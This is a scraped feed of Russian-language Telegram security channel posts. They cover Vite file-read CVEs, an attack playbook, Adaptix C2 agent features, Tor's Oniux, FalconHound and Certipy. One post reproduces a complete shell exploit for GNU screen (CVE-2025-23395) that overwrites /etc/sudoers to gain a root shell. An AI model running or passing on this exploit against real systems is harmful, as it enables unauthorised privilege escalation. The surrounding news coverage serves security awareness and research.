Forwarded from SecuriXy.kz
💥 Тот случай, когда взяли одну уязвимость -
CVE-2025-30208 (📂 Vitejs File Read) и докрутили до следующей: CVE-2025-31125
📦 Обе позволяют обойти защиту @fs и читать файлы вне разрешённого списка.
🧵 Разные методы - один результат: произвольное чтение файлов через URL-параметры.
💡 PoC: github.com/MuhammadWaseem29/Vitejs-exploit
🔐 Обновите Vite, если ваш dev-сервер доступен из сети.
CVE-2025-30208 (📂 Vitejs File Read) и докрутили до следующей: CVE-2025-31125
📦 Обе позволяют обойти защиту @fs и читать файлы вне разрешённого списка.
🧵 Разные методы - один результат: произвольное чтение файлов через URL-параметры.
💡 PoC: github.com/MuhammadWaseem29/Vitejs-exploit
🔐 Обновите Vite, если ваш dev-сервер доступен из сети.
Forwarded from Кибер ПТУ | Кибербезопасность
2025 attacks playbook.pdf
882.1 KB
Смотрим, как нас будут атаковать
Держите плейбук, а точнее сшитые вместе кучу плейбуков с векторами атак по абсолютно разным направлениям уибербеза и IT: от цепочек поставок и дипфейков до зеродеев и IoT-а.
В общем, сюда запихнули почти все известные вам ИБшные термины.
#BaseSecurity
🧠 Твой Пакет Знаний | 👨🏫 Менторство ИБ
📂 Другие каналы
Держите плейбук, а точнее сшитые вместе кучу плейбуков с векторами атак по абсолютно разным направлениям уибербеза и IT: от цепочек поставок и дипфейков до зеродеев и IoT-а.
В общем, сюда запихнули почти все известные вам ИБшные термины.
#BaseSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Adaptix Framework
С версии 0.5 агент gopher будет также работать и в Windows системах...
Еще в данном агенте появится socks5 прокси... А так как агент синхронный, то для каждого канала поднимаются свой поток и отдельное соединение с сервером C2. Туннель способен выдерживать даже многопоточные сканеры)
Еще в данном агенте появится socks5 прокси... А так как агент синхронный, то для каждого канала поднимаются свой поток и отдельное соединение с сервером C2. Туннель способен выдерживать даже многопоточные сканеры)
www.opennet.ru
Проект Tor представил Oniux, утилиту для сетевой изоляции приложений
Разработчики проекта Tor представили утилиту Oniux, предназначенную для принудительного направления трафика отдельных приложений через сеть Tor. По своему назначению Oniux напоминает ранее доступную программу torsocks и отличается использованием для изоляции…
🔗Ссылка:
https://opennet.ru/63237/
https://opennet.ru/63237/
Forwarded from AP Security
#soc
FalconHound
С момента своего выхода в 2016 году BloodHound стал основным инструментом для специалистов по наступательной безопасности, позволяющим выявлять неправильные конфигурации в Active Directory.
Основная цель FalconHound - обеспечить использование всех различных событий в системе и обновление базы данных BloodHound для улучшения качества работы синих команд при его использовании
FalconHound
С момента своего выхода в 2016 году BloodHound стал основным инструментом для специалистов по наступательной безопасности, позволяющим выявлять неправильные конфигурации в Active Directory.
Основная цель FalconHound - обеспечить использование всех различных событий в системе и обновление базы данных BloodHound для улучшения качества работы синих команд при его использовании
GitHub
GitHub - FalconForceTeam/FalconHound: FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of…
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log ag...
👍1
Forwarded from 1N73LL1G3NC3
CVE-2025-23395 Screen LPE exploit
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
#!/bin/sh
F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
echo "[+] bl1ng bl1ng, we got it"
sudo sh
else
echo "[-] exploit failed :("
fi
rm -rf $F $L
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Несколько часов назад была сильно обновлена утилита certipy. Обратим внимание, что в документации также появилось описание техники ESC16...
#redteam #pentest #ad #adcs
#redteam #pentest #ad #adcs
GitHub
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy
Forwarded from Adaptix Framework